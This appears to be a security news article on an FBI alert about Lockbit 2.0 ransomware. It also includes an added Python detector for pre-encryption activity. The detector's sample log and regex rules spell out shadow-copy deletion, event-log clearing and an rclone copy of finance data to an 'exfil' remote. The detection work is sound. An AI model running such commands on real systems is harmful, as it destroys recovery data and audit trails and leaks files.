The Federal Bureau of Investigation (FBI) has released indicators of compromise (IoCs) and details of the tactics, techniques, and procedures (TTPs) associated with Lockbit 2.0 ransomware.
Lockbit is a ransomware-as-a-service (RaaS) operation that has been active since September 2019. In the summer of 2021, a new version of the ransomware – Lockbit 2.0 – was released with more advanced features, including the ability to automatically encrypt devices across Windows domains by abusing Active Directory group policies, and a Linux-based variant was also developed that takes advantage of vulnerabilities in VMware ESXi virtual machines.
The affiliates working for the ransomware operation use a range of TTPs in their attacks, which makes prevention, detection, and mitigation a challenge for security teams. Initial access is gained by exploiting unpatched vulnerabilities, using zero-day exploits, and purchasing access to business networks from initial access brokers (IABs). Shortly after the relaunch of the RaaS, the threat actor started advertising on hacking forums trying to recruit insiders who could provide network access in exchange for a cut of any ransom payment that is generated.
Once access to a network has been gained, the threat actors use a range of publicly available tools for lateral movement, privilege escalation, and exfiltrating sensitive data. Stolen data are used as leverage to pressure victims into paying the ransom. If victims refuse to pay the ransom, stolen data are published on the Lockbit 2.0 data leak site.
During the infection process, the ransomware deletes log files and volume shadow copies and enumerates system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. Affiliates can specify in the admin panel which file types to exfiltrate; the selected files are then copied to an attacker-controlled server via HTTP. Some affiliates exfiltrate data by other means, such as rclone, MEGAsync, and publicly available file-sharing services. After exfiltration, the ransomware encrypts files on local and remote devices, skipping files associated with core system functions. It then deletes itself from disk and creates persistence at startup. Lockbit 2.0 checks the system and user language settings and exits without encrypting anything if Russian or another language of the former Soviet republics is detected.
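The pre-encryption behaviour described above (shadow copy and log deletion, followed by bulk exfiltration with tools such as rclone or MEGAsync) is the window in which a security team can still intervene. As an added detection example, not code from the FBI alert or this article, the following Python scans process-creation log lines for those precursors and flags hosts where both shadow copies were deleted and event logs were cleared. The log line format, the host names and the command lines are constructed for this example; the command-line patterns (vssadmin, wmic shadowcopy, wevtutil cl, Clear-EventLog, rclone, MEGAsync) are common ways of performing these actions on Windows and are assumptions, not indicators taken from the alert.

```python
"""Precursor detection for ransomware-style pre-encryption activity.

Added example; not from the FBI Flash alert. The command-line patterns are
generic Windows techniques (assumed), not Lockbit 2.0 IoCs from the alert.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Hit:
    line_no: int
    rule: str
    host: str
    command: str


# Rule name -> regex matched against the process command line.
RULES = {
    # Volume shadow copy deletion (assumed patterns).
    "shadow_copy_deletion": re.compile(
        r"(vssadmin(\.exe)?\s+delete\s+shadows"
        r"|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|Win32_ShadowCopy.*\.Delete\(\))",
        re.I,
    ),
    # Windows event log clearing (assumed patterns).
    "event_log_clearing": re.compile(r"(wevtutil(\.exe)?\s+cl\b|Clear-EventLog\b)", re.I),
    # Exfiltration tooling named in the article (rclone, MEGAsync).
    "exfil_tooling": re.compile(r"\b(rclone(\.exe)?|megasync(\.exe)?|MEGAcmd)\b", re.I),
}

# Constructed log format: <timestamp> host=<hostname> user=<user> cmd=<command line>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$"
)


def scan(lines):
    """Return a Hit for every (line, rule) pair that matches; unparsable lines are skipped."""
    hits = []
    for n, raw in enumerate(lines, start=1):
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        cmd = m.group("cmd")
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append(Hit(n, name, m.group("host"), cmd))
    return hits


def hosts_with_precursor_chain(hits):
    """Hosts that both deleted shadow copies and cleared event logs.

    Either action alone can be legitimate admin work; the two together on one
    host shortly before bulk file activity is a much stronger signal.
    """
    by_host = {}
    for h in hits:
        by_host.setdefault(h.host, set()).add(h.rule)
    required = {"shadow_copy_deletion", "event_log_clearing"}
    return sorted(host for host, rules in by_host.items() if required <= rules)


# Constructed sample log (raw strings so the Windows backslashes survive).
SAMPLE_LOG = [
    r'2022-02-05T01:12:03Z host=WS-014 user=CORP\jdoe cmd="C:\Windows\System32\notepad.exe"',
    r"2022-02-05T01:13:44Z host=SRV-FILE01 user=CORP\svc_backup cmd=vssadmin.exe delete shadows /all /quiet",
    r"2022-02-05T01:13:51Z host=SRV-FILE01 user=CORP\svc_backup cmd=wevtutil.exe cl Security",
    r"2022-02-05T01:15:02Z host=SRV-FILE01 user=CORP\svc_backup cmd=rclone.exe copy D:\Finance remote:exfil --transfers 8",
    r"2022-02-05T01:20:10Z host=WS-022 user=CORP\asmith cmd=wevtutil.exe cl Application",
    r'2022-02-05T01:21:00Z host=SRV-DC01 user=CORP\admin cmd="C:\Program Files\MEGAsync\MEGAsync.exe"',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"line {h.line_no}: {h.rule} on {h.host}: {h.command}")
    print("hosts with shadow-copy deletion AND log clearing:", hosts_with_precursor_chain(found))
```

In production the same rules would run over Sysmon Event ID 1 or Windows Security Event ID 4688 command-line fields rather than this constructed format; the value is in correlating the individual hits per host, since a single wevtutil or vssadmin call is routine on some servers but the combination rarely is.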
Like several other RaaS operations, the group claims it will not conduct ransomware attacks on healthcare organizations; however, other groups have made similar claims and still attacked the healthcare sector. The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has advised all organizations in the healthcare and public health (HPH) sector to read and apply the information in the FBI’s TLP:WHITE Flash Alert and to reduce their attack surface to the greatest extent possible.
Measures that should be taken include setting strong, unique passwords for all accounts, implementing multi-factor authentication, keeping software and operating systems up to date, removing unnecessary access to administrative shares, segmenting networks, and implementing a host-based firewall and robust data backup program.